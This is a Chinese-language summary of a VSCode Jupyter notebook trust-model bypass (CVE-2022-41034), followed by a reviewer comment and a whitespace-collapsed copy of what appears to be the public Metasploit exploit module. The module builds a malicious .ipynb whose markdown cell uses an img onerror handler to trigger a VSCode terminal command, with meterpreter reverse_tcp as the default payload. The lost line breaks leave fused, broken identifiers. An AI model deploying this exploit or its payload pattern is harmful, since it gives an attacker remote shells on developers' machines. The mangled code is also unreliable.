该漏洞利用了 VSCode 在打开 Jupyter Notebook 文件时绕过信任模型的缺陷:在 VSCode 1.4.0 到 1.71.1 版本中,Jupyter Notebook 文件可以嵌入 HTML 和 JavaScript 代码,并通过打开新的终端窗口在 VSCode 中执行任意代码。攻击者可以利用该漏洞在受害者机器上执行恶意代码,例如远程控制受害者机器或窃取敏感信息。
💥 该漏洞利用了 VSCode 在打开 Jupyter Notebook 文件时绕过信任模型的缺陷,允许攻击者在 Jupyter Notebook 文件中嵌入 HTML 和 JavaScript 代码。
💻 当用户打开包含恶意代码的 Jupyter Notebook 文件时,VSCode 会执行嵌入的 JavaScript 代码,并打开新的终端窗口。
😈 攻击者可以通过在终端窗口中执行任意代码来控制受害者机器,例如执行恶意程序、窃取敏感信息或进行其他恶意操作。
🛡️ 为了防止该漏洞被利用,建议用户及时更新 VSCode 到最新版本,并谨慎打开来自未知来源的 Jupyter Notebook 文件。
⚠️ 由于该漏洞可能导致攻击者获得受害者机器的控制权,建议用户在使用 VSCode 打开外部文件时保持警惕,并及时更新软件以修复漏洞。
💻 攻击者可以通过在 Jupyter Notebook 文件中嵌入 HTML 和 JavaScript 代码来绕过 VSCode 的信任模型,并在打开文件时执行恶意代码。
😈 恶意代码可以在新的终端窗口中执行,攻击者可以利用该漏洞来控制受害者机器或窃取敏感信息。
🛡️ 建议用户及时更新 VSCode 到最新版本,并谨慎打开来自未知来源的 Jupyter Notebook 文件,以防止该漏洞被利用。
# NOTE(review): this is a whitespace-collapsed paste of the public Metasploit
# module for CVE-2022-41034 (VSCode .ipynb trust-model bypass). Line breaks and
# the leading `#` of the original comment lines were lost, so identifiers are
# fused (e.g. `RemoteRank`, `ExcellentRankinginclude`, `HttpServerdef`) and the
# text below is not loadable as-is; it is kept verbatim for reference only.
# Affected range per the module's own description: VSCode v1.4.0 - v1.71.1,
# tested against 1.70.2 on Windows 10.
# Defender takeaways grounded in the module body: the served notebook's markdown
# cell carries an `<img onerror=...>` handler that programmatically clicks a
# `command:workbench.action.terminal.new` link, so notebook markdown cells that
# contain `command:` URIs or inline event handlers are the artefact to hunt for;
# mitigation is updating VSCode beyond the affected range and not opening .ipynb
# files from untrusted sources. The module's own notes flag FIRST_ATTEMPT_FAIL,
# i.e. a first failed open is not evidence the attempt was harmless.
This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRankinginclude Msf::Exploit::Remote::HttpServerdef initialize(info = {})super(update_info(info,'Name' => 'VSCode ipynb Remote Development RCE','Description' => %q{VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embedHTML and javascript, which can then open new terminal windows within VSCode.Each of these new windows can then execute arbitrary code at startup.During testing, the first open of the Jupyter notebook resulted in pop-upsdisplaying errors of unable to find the payload exe file. The second attemptat opening the Jupyter notebook would result in successful exeuction.Successfully tested against VSCode 1.70.2 on Windows 10.},'License' => MSF_LICENSE,'Author' => ['h00die', # metasploit module'Zemnmez'],'References' => [['URL', 'https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m'],['CVE', '2022-41034'],['URL', 'https://github.com/andyhsu024/CVE-2022-41034']],'DisclosureDate' => '2022-11-22','Privileged' => false,'Arch' => ARCH_CMD,'Stance' => Stance::Aggressive,'Payload' => { 'BadChars' => '&"' },'Targets' => [['Windows',{'Platform' => 'win','DefaultOptions' => {'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'}}],['Linux File-Dropper',{'Platform' => 'linux','DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}}]],'DefaultTarget' => 0,'DefaultOptions' => {'WfsDelay' => 3_600, # 1hr'URIPATH' => 'project.ipynb'},'Notes' => {'Stability' => [CRASH_SAFE],# on windows it will say the final payload can't be found# however, it is, seems to be a timing issue, 2nd exploit attempt# works perfectly'Reliability' => [REPEATABLE_SESSION, FIRST_ATTEMPT_FAIL],'SideEffects' => 
[SCREEN_EFFECTS]}))register_options([OptString.new('PAYLOAD_FILENAME', [ false, 'Name of the payload file - only required when exploiting on Linux.', 'shell.sh' ]),OptString.new('WRITABLE_DIR', [ false, 'Name of the writable directory containing the payload file - required when exploiting on Linux .', '/tmp/' ]),])enddef checkCheckCode::Unsupportedenddef exploitunless datastore['URIPATH'].end_with? '.ipynb'fail_with(Failure::BadConfig, 'URIPATH must end in .ipynb for exploit to be successful')endprint_status('Starting up web service...')start_servicesleep(datastore['WFSDELAY'])enddef on_request_uri(cli, request)super unless request.uri.end_with? datastore['URIPATH']if target['Platform'] == 'win'config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }elseconfig = { 'executable' => "/#{datastore['WRITABLE_DIR']}/#{datastore['PAYLOAD_FILENAME']}" }endpload = JSON.dump({ 'config' => config })pload = CGI.escape(pload).gsub('+', '%20') # XXX not sure if this is needed or not, but it worksipynb = %|{"cells": [{"cell_type": "markdown","metadata": {},"source": ["<img src=a onerror=\"let q = document.createElement('a');q.href='command:workbench.action.terminal.new?#{pload}';document.body.appendChild(q);q.click()\"/>"]}]}|send_response(cli, ipynb, {'Connection' => 'close','Pragma' => 'no-cache','Access-Control-Allow-Origin' => '*'})print_status("Sent #{datastore['URIPATH']} to #{cli.peerhost}")endend